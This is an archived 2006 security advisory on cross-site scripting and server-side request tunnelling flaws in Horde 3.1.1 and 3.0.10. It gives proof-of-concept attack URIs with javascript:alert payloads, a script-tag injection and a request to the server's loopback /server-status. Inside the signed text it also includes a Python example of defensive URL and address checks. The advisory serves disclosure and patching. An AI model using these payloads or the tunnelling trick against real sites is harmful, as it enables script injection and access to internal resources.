horde3113010.txt

2006-07-09T00:00:00
ID PACKETSTORM:48074
Type packetstorm
Reporter Moritz Naumann
Modified 2006-07-09T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
  
SA0011  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+++++ Horde 3.1.1, 3.0.10 Multiple Security Issues +++++  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
PUBLISHED ON  
July 05, 2006  
  
  
PUBLISHED AT  
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt  
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg  
  
  
PUBLISHED BY  
Moritz Naumann IT Consulting & Services  
Hamburg, Germany  
http://moritz-naumann.com/  
  
SECURITY at MORITZ hyphon NAUMANN d0t COM  
GPG key: http://moritz-naumann.com/keys/0x277F060C.asc  
  
  
AFFECTED APPLICATION OR SERVICE  
Horde Application Framework  
http://www.horde.org  
  
The Horde Framework is a common code-base used by Horde  
applications, including libraries and a common user interface.  
The best known Horde application to date is probably IMP, a webbased  
IMAP/SMTP client.  
  
  
AFFECTED VERSIONS  
Version 3.0.0 up to and including 3.0.10  
Version 3.1.0 up to and including 3.1.1  
Versions below 3.0.0 have not been examined.  
  
  
ISSUES  
Horde is subject to multiple security vulnerabilities, ranging from  
information disclosure to client side script injection (cross site  
scripting) issues.  
  
+++++ 1. Cross Site Scripting #1  
Horde is subject to a client side script injection vulnerability in  
the URL redirection (dereferrer) function.  
  
By accessing the following (partial) URI on a web site running an  
affected version with a web browser which is prone to this issue,  
client side script code will be injected into the output generated  
by the application:  
  
[Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);  
  
This problem is caused by insufficient validation of user supplied  
input. It is only known to be exploitable on Internet Explorer 6  
(tested on v6.2900.2180 including all patches on Windows XP SP2).  
Internet Explorer 7 beta 3 is not affected.  
  
+++++ 2. Cross Site Scripting #2  
Horde is subject to a client side script injection vulnerability in  
the help function.  
  
By accessing the following (partial) URI on a web site running a  
vulnerable version with a web browser which is prone to this issue,  
client side script code will be injected into the output generated  
by the application:  
  
  
[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E  
  
This problem is caused by insufficient validation of user supplied  
input. All common modern browsers providing Javascript support are  
assumed to be prone to this issue.  
  
+++++ 3. Cross Site Scripting #3  
Horde is subject to a client side script injection  
vulnerability in the problem reporting function.  
  
By accessing the following (partial) URI on a web site running a  
vulnerable version with a web browser which is prone to this issue,  
client side script code will be injected into the output generated  
by the application:  
  
  
[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22  
  
This problem is caused by insufficient validation of user supplied  
input. All common modern browsers providing Javascript support are  
assumed to be prone to this issue.  
  
+++++ 4. Cross Site Scripting #4, Web tunneling behaviour  
Horde is subject to a server side issue which allows HTTP GET requests  
to be tunnelled through the application and remotely hosted web script  
to be injected into the output generated by the application.  
  
This behaviour allows access to arbitrary locations addressable by URIs  
using the 'http://', 'https://' or 'ftp://' protocol handlers. These  
locations are fetched from within the security context of the web  
server running an affected version of the application. As a result, an  
attacker may be able to reach remote locations they would not otherwise  
have access to, without disclosing the real source of the request [1].  
Additionally, insufficiently access-restricted local (server-side) or  
remote (3rd party) locations may become reachable [2].  
  
By tricking a victim into starting a tunnelling call to a previously  
prepared malicious HTML file stored in a remote location, containing  
web script which is executed on the client side, it is possible to  
extend this into a script injection issue. The injected script is  
executed by the client within the context of the domain the vulnerable  
web application is hosted in [3]. All common modern browsers providing  
Javascript support are assumed to be prone to this issue.  
  
By accessing the following (partial) URIs on a web site running a  
vulnerable version with a web browser, the behaviours described  
above may be triggered:  
  
[1]  
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/  
[2]  
[Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status  
[3]  
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html  
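  
Issues 1 and 4 both live in the go.php dereferrer, and two separate  
checks address them. The issue 1 payload works because the URL is  
placed into a refresh value without validation, so ';URL=javascript:'  
is re-read as a second URL; a syntactic check on the target stops that.  
The issue 4 cases [1] and [2] work because the server fetches whatever  
it is handed, including its own loopback; a check on the resolved  
address stops those. Case [3] passes both checks by design, because the  
remedy there is not to render fetched third-party content inside the  
application's origin at all. The following Python is an added example  
of both checks; it is not Horde's PHP code, the function names are  
hypothetical, and the DNS table is constructed so the example runs  
offline (the addresses are made up, not the real records of those  
names).  

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {'http', 'https', 'ftp'}

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
# IPv6 literals are deliberately not accepted by this dereferrer.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)'
    r'(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$')

# Characters that must never reach a Refresh header or meta refresh value:
# controls and whitespace (header splitting), ';' (separates the delay from
# 'URL=' in a Refresh value, which is the trick in the issue 1 payload) and
# the quote and angle characters that would end an attribute or a tag.
FORBIDDEN_RE = re.compile(r'[\x00-\x20\x7f;"\'<>]')


def redirect_target(url: str):
    """Return url unchanged if it is a plain absolute http/https/ftp URL that
    is safe to place in a Refresh value, otherwise None. Hypothetical helper."""
    if FORBIDDEN_RE.search(url):
        return None
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None            # also rejects javascript:, data:, file:
    if parts.username is not None or parts.password is not None:
        return None            # http://trusted@evil.example/ lookalikes
    try:
        _ = parts.port         # raises ValueError on a non-numeric port
    except ValueError:
        return None
    host = parts.hostname or ''
    if not HOSTNAME_RE.match(host):
        return None            # rejects '', '.', '[::1]' and junk
    return url


def default_resolver(host: str) -> list:
    """Real DNS lookup; used only when no stub resolver is passed in."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def fetch_target(url: str, resolver=default_resolver):
    """Stricter check for the server-side fetch (the 'untrusted=1' mode of
    issue 4): on top of redirect_target(), every address the host resolves
    to must be globally routable, so the server cannot be pointed at its own
    loopback (e.g. /server-status), RFC 1918 space or link-local ranges."""
    clean = redirect_target(url)
    if clean is None:
        return None
    host = urlsplit(clean).hostname
    try:
        addrs = [ipaddress.ip_address(host)]          # IP literal host
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            return None
    if not addrs or not all(a.is_global for a in addrs):
        return None
    return clean


# Constructed stub DNS table so the example runs offline; the addresses are
# made up and are not the real records of these names.
STUB_DNS = {
    'moritz-naumann.com': ['93.184.216.34'],
    'localhost': ['127.0.0.1', '::1'],
    'intranet.example': ['10.1.2.3'],
    'metadata.example': ['169.254.169.254'],
}


def stub_resolver(host: str) -> list:
    if host not in STUB_DNS:
        raise socket.gaierror(f'stub: no record for {host}')
    return STUB_DNS[host]


if __name__ == '__main__':
    for u in ['http://./;URL=javascript:alert(0);',
              'http://moritz-naumann.com/',
              'http://localhost/server-status',
              'http://127.0.0.1/server-status',
              'http://intranet.example/']:
        print(f'{u:45} redirect={redirect_target(u) is not None!s:5} '
              f'fetch={fetch_target(u, stub_resolver) is not None}')
```

Two caveats a practitioner should keep in mind. The address check  
resolves the name once, and the later fetch resolves it again, so a  
rebinding DNS record can pass the check and then point at loopback; the  
robust form connects to the vetted address itself and sends the host  
name only in the Host header. And nothing here helps with case [3]: if  
fetched HTML must be shown at all, it belongs on a separate origin or  
behind a Content-Disposition: attachment response with nosniff, never  
inline in the application's own pages.  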
  
  
BACKGROUND  
Cross Site Scripting (XSS):  
Cross Site Scripting, also known as XSS or CSS, describes  
the injection of malicious content into output produced  
by a web application. A common attack vector is the  
inclusion of arbitrary client side script code in the  
application's output. Failure to validate user input and  
to encode it for the output context can cause a web  
application to be vulnerable to Cross Site Scripting.  
  
http://www.owasp.org/index.php/Cross_Site_Scripting  
http://en.wikipedia.org/wiki/XSS  
http://www.cgisecurity.net/articles/xss-faq.shtml  
  
  
WORKAROUNDS  
Issues 1-3:  
Client: Disable Javascript.  
Server: Prevent access to vulnerable file(s).  
Issue 4:  
Client: Use application as intended only.  
Server: Prevent access to vulnerable file(s).  
  
  
SOLUTIONS  
The Horde project has released versions 3.1.2 and 3.0.11 today.  
These are supposed to fix all of the above issues. The updated  
packages are available at http://horde.org/  
  
  
TIMELINE  
Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification  
Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement  
Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly  
Jul 05, 2006 Issues 1-4: Public advisory  
  
  
NOTES  
This is not related to CVE-2006-2195.  
  
  
REFERENCES  
Developers' release announcements  
v3.1.2: http://lists.horde.org/archives/announce/2006/000288.html  
v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html  
  
  
ADDITIONAL CREDIT  
N/A  
  
  
LICENSE  
Creative Commons Attribution-ShareAlike License Germany  
http://creativecommons.org/licenses/by-sa/2.0/de/  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.3 (GNU/Linux)  
  
iD8DBQFErDF5n6GkvSd/BgwRAlIlAJ9xrsIW0RfsRyGD0POmQuiamKE0QwCeNHbU  
VYOhRZ7bDiPo6TZfHYl93mE=  
=Avtu  
-----END PGP SIGNATURE-----  